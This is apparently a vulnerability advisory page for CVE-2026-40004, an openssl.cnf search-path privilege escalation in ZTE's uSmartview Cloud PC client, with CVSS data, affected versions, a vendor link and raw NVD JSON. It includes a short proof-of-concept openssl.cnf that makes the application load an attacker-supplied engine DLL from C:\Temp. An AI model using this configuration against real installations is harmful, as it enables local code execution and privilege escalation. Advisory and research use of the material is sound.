Security Vulnerability Report
CVE-2026-40004 CVSS 5.5 MEDIUM

Published: 2026-05-07 04:16:23
Last Modified: 2026-05-13 19:17:36

Description

There exists an openssl.cnf privilege escalation vulnerability in ZTE Cloud PC client uSmartview. An attacker can execute arbitrary code locally and escalate privileges.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:zte:zxcloud_irai:*:*:*:*:*:*:*:* - VULNERABLE
ZTE Cloud PC client uSmartview (refer to the official advisory for specific versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
ini
# Malicious openssl.cnf configuration
# Place this file in the vulnerable application's config path
openssl_conf = openssl_init

[openssl_init]
engines = engine_section

[engine_section]
payload = payload_section

[payload_section]
engine_id = payload
dynamic_path = C:\Temp\exploit.dll
init = 0

# Explanation:
# The application loads this config file during startup.
# It attempts to load an engine DLL defined by 'dynamic_path'.
# The exploit.dll contains the malicious code to be executed.

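References

https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/3126272076755775573 (Vendor Advisory)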

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40004", "sourceIdentifier": "[email protected]", "published": "2026-05-07T04:16:23.073", "lastModified": "2026-05-13T19:17:35.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There exists an openssl.cnf privilege escalation vulnerability in ZTE Cloud PC client uSmartview. An attacker can execute arbitrary code locally and escalate privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.3, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zte:zxcloud_irai:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.23.20", "versionEndExcluding": "7.25.43", "matchCriteriaId": "C6E53081-879B-41EE-AAEA-1D5EC10B8721"}]}]}], "references": [{"url": "https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/3126272076755775573", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}